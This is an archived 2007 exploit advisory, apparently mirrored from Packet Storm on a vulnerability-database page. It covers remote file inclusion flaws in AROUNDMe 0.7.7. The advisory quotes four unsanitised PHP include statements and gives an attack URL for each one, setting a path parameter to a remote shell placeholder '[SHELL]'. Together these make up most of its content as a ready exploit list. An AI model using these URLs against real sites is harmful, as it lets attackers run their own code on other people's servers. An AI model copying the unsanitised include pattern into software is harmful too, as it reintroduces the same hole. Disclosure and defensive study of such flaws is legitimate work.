Lucene search

aroundme-rfi.txt

🗓️ 05 Apr 2007 00:00:00Reported by kezzap66345Type

packetstorm🔗 packetstormsecurity.com👁 21 Views

AROUNDMe 0.7.7 Remote File Inclusion Vulnerabilitie

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`AROUNDMe _0_7_7  
*****************  
Found by kezzap66345 *  
*****************  
*****************  
Script  
Download:http://download.savannah.gnu.org/releases/aroundme/aroundme_0_7_7.tar.gz  
  
*****************  
*****************  
ERROR#1:  
File:\components\core\inc\core_profile.header.php  
*****************  
  
  
include_once($language_path_core . 'inc/me_common.inc.php'); <<< rfi coded  
  
  
**************************************************************************************  
RFI#1:  
  
http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]  
  
  
**************************************************************************************  
  
*****************  
ERROR#2:  
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php  
*****************  
  
<?php  
include $template_path_core . "inc/comment.inc.php";  
?> <<< rfi coded  
  
  
**************************************************************************************  
RFI#2:  
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]  
  
  
  
  
ERROR#3:  
File:/components/core/template/barnraiser_01/default.tpl.php  
*****************  
  
  
include_once($template_path . "inc/menu_" . $section . ".inc.php"); <<< rfi coded  
  
  
**************************************************************************************  
RFI#3:  
  
http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]  
  
  
**************************************************************************************  
  
*****************  
ERROR#4:  
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php  
*****************  
include($template_path_core . "inc/form_gui_html_editor.inc.php"); <<<  
rfi coded  
  
  
**************************************************************************************  
RFI#4:  
  
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]  
Thanks:Siircicocuk and x0r0n  
**************************************************************************************  
**************************************************************************************  
**************************************************************************************  
**************************************************************************************  
******Thanx****SiiRCiCOCUK****str0ke**************************************************  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

05 Apr 2007 00:00Current

7.4High risk

Vulners AI Score7.4